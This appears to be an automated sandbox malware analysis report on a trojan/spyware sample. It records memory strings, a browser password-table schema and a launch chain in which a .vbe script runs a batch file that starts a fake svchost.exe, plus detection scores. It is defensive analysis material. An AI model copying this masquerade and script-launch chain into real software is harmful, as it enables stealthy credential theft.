Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\comref\svchost.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary

barindex
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\comref\svchost.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002E6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_002E6FAA
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002E848E 0_2_002E848E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002F00B7 0_2_002F00B7
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002F4088 0_2_002F4088
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002E40FE 0_2_002E40FE
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002F7153 0_2_002F7153
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_003051C9 0_2_003051C9
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002E32F7 0_2_002E32F7
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002F62CA 0_2_002F62CA
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002F43BF 0_2_002F43BF
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002EC426 0_2_002EC426
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002EF461 0_2_002EF461
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_0030D440 0_2_0030D440
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002F77EF 0_2_002F77EF
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002E286B 0_2_002E286B
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_0030D8EE 0_2_0030D8EE
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002EE9B7 0_2_002EE9B7
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_003119F4 0_2_003119F4
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002F6CDC 0_2_002F6CDC
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002F3E0B 0_2_002F3E0B
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_00304F9A 0_2_00304F9A
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002EEFE2 0_2_002EEFE2
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB780D74 14_2_00007FFAAB780D74
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB9473FB 14_2_00007FFAAB9473FB
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB946B7D 14_2_00007FFAAB946B7D
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB946960 14_2_00007FFAAB946960
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB93094D 14_2_00007FFAAB93094D
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB945155 14_2_00007FFAAB945155
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB93000A 14_2_00007FFAAB93000A
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB946DF3 14_2_00007FFAAB946DF3
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB946CF2 14_2_00007FFAAB946CF2
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ApTjSBhc.log A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\LMrHnriI.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: String function: 002FEB78 appears 39 times
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: String function: 002FF5F0 appears 31 times
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: String function: 002FEC50 appears 56 times
Source: LMrHnriI.log.14.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: eVuUdNSS.log.14.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ThQetCXk.log.14.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: jIMTFKhG.log.14.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ugRGgCJhQl.exe, 00000000.00000003.1238149934.0000000002678000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs ugRGgCJhQl.exe
Source: ugRGgCJhQl.exe, 00000000.00000003.1238149934.0000000002678000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs ugRGgCJhQl.exe
Source: ugRGgCJhQl.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ugRGgCJhQl.exe
Source: ugRGgCJhQl.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: svchost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: LMrHnriI.log.14.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: eVuUdNSS.log.14.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: ThQetCXk.log.14.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: jIMTFKhG.log.14.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: ApTjSBhc.log.14.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/466@0/1
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002E6C74 GetLastError,FormatMessageW, 0_2_002E6C74
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_002FA6C2
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\LMrHnriI.log Jump to behavior
Source: C:\comref\svchost.exe Mutant created: NULL
Source: C:\comref\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\00a407d7263350ca9f7793f96a31d0aad7843c9072ff0d1a09dfe32680f80b8d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
Source: C:\comref\svchost.exe File created: C:\Users\user\AppData\Local\Temp\Wxdj6ODvaY Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" "
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Command line argument: sfxname 0_2_002FDF1E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Command line argument: sfxstime 0_2_002FDF1E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Command line argument: STARTDLG 0_2_002FDF1E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Command line argument: xz3 0_2_002FDF1E
Source: ugRGgCJhQl.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ugRGgCJhQl.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 1WY2jjUdl1.14.dr, L21sbTTxmo.14.dr, L9xikfAntt.14.dr, D1Cp9d6zuD.14.dr, XTiotNMabD.14.dr, AMXqSHCB0s.14.dr, PjI6MUHJUZ.14.dr, NXfnoTydBh.14.dr, nYudwX8gSM.14.dr, vAgN0dNWXr.14.dr, VZr7vJ0zSo.14.dr, 7HU1FRJInX.14.dr, LtLchCAi4O.14.dr, XFurddSr42.14.dr, IlNgX09QuD.14.dr, Mxj7t1e7if.14.dr, UxnVdDyGZe.14.dr, NRjtAvmiUd.14.dr, TagpmgdvsD.14.dr, iWnabsCJnr.14.dr, mOKZPBiCta.14.dr, 9gvbbcUMnO.14.dr, 4doU9r80ih.14.dr, 7xNyfuPjyQ.14.dr, lvE3a6Gu0n.14.dr, jod8OY0J2b.14.dr, hI5x53vsfQ.14.dr, pL2w5izY5m.14.dr, lf6Auv5kcP.14.dr, Y2vzc6ZVEC.14.dr, K8pnTAe2bu.14.dr, 7jIGlhSCkj.14.dr, ZKNTTtqrWX.14.dr, Q4IOgQPg2i.14.dr, iclKmVmWNH.14.dr, o0LFCQdkbf.14.dr, c7XbMfG0Wv.14.dr, 1y4JQx39Pf.14.dr, miieUuZJJv.14.dr, kfWrPVlysn.14.dr, s2krFZAl2j.14.dr, TvDJh7kSEj.14.dr, 6VZBlysEyt.14.dr, 4711XsDufK.14.dr, wSydYuohLM.14.dr, MOJJPsr9Mx.14.dr, K5H9XlnP1v.14.dr, HWBcRDH0Nl.14.dr, I8riyAvUXy.14.dr, jkA3w9Se1c.14.dr, NBT1jkkyGz.14.dr, iuOVz3fm4z.14.dr, d4iMuKFf4y.14.dr, LXvYLiTK9n.14.dr, LUAMPIdxsr.14.dr, ILFGyJrkQR.14.dr, nh3HpWjBQz.14.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ugRGgCJhQl.exe Virustotal: Detection: 56%
Source: ugRGgCJhQl.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe File read: C:\Users\user\Desktop\ugRGgCJhQl.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ugRGgCJhQl.exe "C:\Users\user\Desktop\ugRGgCJhQl.exe"
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\comref\svchost.exe "C:\comref/svchost.exe"
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\comref\svchost.exe "C:\comref/svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: kernel.appcore.dll Jump to behavior
